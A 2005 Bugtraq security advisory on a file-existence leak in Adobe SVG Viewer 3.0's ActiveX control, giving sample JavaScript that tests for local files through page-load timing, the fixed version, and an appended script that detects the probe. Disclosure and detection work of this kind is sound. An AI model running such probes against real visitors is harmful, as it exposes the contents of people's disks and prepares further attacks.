Date: Wed, 4 May 2005 08:37:37 -0700
From: "Hyperdose Security" <robfly@...erdose.com>
To: <bugtraq@...urityfocus.com>
Subject: Local file detection bug found through Adobe SVG Viewer


Hyperdose Security Advisory

Name: Local file detection bug found through Adobe SVG Viewer
Systems Affected: v3.0 (unclear if earlier versions were affected)
Severity: Low
Author: Robert Fly - robfly@...erdose.com
Advisory URL: http://www.hyperdose.com/advisories/H2005-07.txt

--Adobe Description--
From Adobe.com, "Adobe helps people and businesses communicate better
through its world-leading digital imaging, design, and document technology
platforms for consumers, creative professionals, and enterprises."

--Bug Details--
Adobe SVG Viewer contains a Safe for Scripting ActiveX control (file
NPSVG3.dll).  The control contains a property named 'src'.  When 'src' is
set to a file that does exist, the web page will stop loading immediately.
If 'src' is set to a file that does not exist, the page will continue to load
(specifically, readyState will not hit the complete state).  Using this trick,
a little bit of JavaScript can be used to determine whether local files exist
on a user's hard drive.  Knowing the existence of files can be a stepping
stone for further attacks.

Proof of concept: http://www.hyperdose.com/exploits/AdobeSVG.html
Sample Javascript:
function load(filename)
{
	// foo is a reference to the SVG ActiveX control; filename is the
	// file you're looking for
	foo.src = filename;  
	setTimeout("loading()", 5000);
}

function loading()
{
	if (document.readyState != 'complete')
	{
		alert('File does not exist.');
	}
	else
	{
		alert('File exists.');
	}
	window.location.reload(false);
}


This bug is very similar to Hyperdose's last advisory on Adobe
(http://www.hyperdose.com/advisories/H2005-06.txt).  The exploit mechanism
for this one, though, is more interesting.  Be aware of timing-based attacks.
If you pay attention, they're out there.

--Fix Information--
Upgrade to version 3.03.  
Details from Adobe found here:
http://www.adobe.com/svg/viewer/install/mainframed.html

--About Hyperdose--
Hyperdose Security was founded to provide companies with application
security knowledge through all parts of an application's security
development lifecycle.  We specialize in all phases of software development
ranging from security design and architectural reviews to security code
reviews and penetration testing.

web   www.hyperdose.com 
email robfly@...erdose.com
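
For reviewing saved page source, the sample script's shape (an assignment to 'src', a timer, then a document.readyState comparison) can be flagged statically. The following is an added example, not part of the original advisory; the signal names, the scoring, and both sample pages are assumptions constructed for illustration.

```javascript
// Added example, not from the advisory. Signal names and the scoring are assumptions.
const SIGNALS = {
  srcAssignment: /\.src\s*=(?!=)/,                    // e.g. foo.src = filename
  readyStateCheck: /document\.readyState\s*[!=]==?/,  // e.g. readyState != 'complete'
  timer: /\bset(?:Timeout|Interval)\s*\(/,            // delayed re-check of load state
  localPath: /file:\/\/|["'][A-Za-z]:[\\/]/           // file:// URL or quoted drive path
};

// Pull the bodies of inline <script> elements out of saved page source.
function extractInlineScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim() !== "") bodies.push(m[1]);
  }
  return bodies;
}

// Score one script: all three core signals together match the probe's shape.
function assessScript(source) {
  const hits = {};
  for (const [name, re] of Object.entries(SIGNALS)) hits[name] = re.test(source);
  const probeShape = hits.srcAssignment && hits.readyStateCheck && hits.timer;
  const confidence = !probeShape ? "none" : hits.localPath ? "high" : "medium";
  return { hits, probeShape, confidence };
}

function assessPage(html) {
  return extractInlineScripts(html).map(assessScript);
}

// Constructed sample pages (not captured traffic); the path is a placeholder.
const CONSTRUCTED_SUSPECT = String.raw`<html><body><script>
function load(filename) { foo.src = filename; setTimeout("loading()", 5000); }
function loading() { if (document.readyState != 'complete') { note(); } }
load('C:\\placeholder.txt');
</script></body></html>`;

const CONSTRUCTED_BENIGN = String.raw`<html><body><script>
var img = new Image(); img.src = "/logo.png";
if (document.readyState === "complete") { init(); }
</script></body></html>`;

console.log(assessPage(CONSTRUCTED_SUSPECT), assessPage(CONSTRUCTED_BENIGN));
```

This is a triage heuristic: a "medium" result only means the three signals co-occur in one script and still needs a human read.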




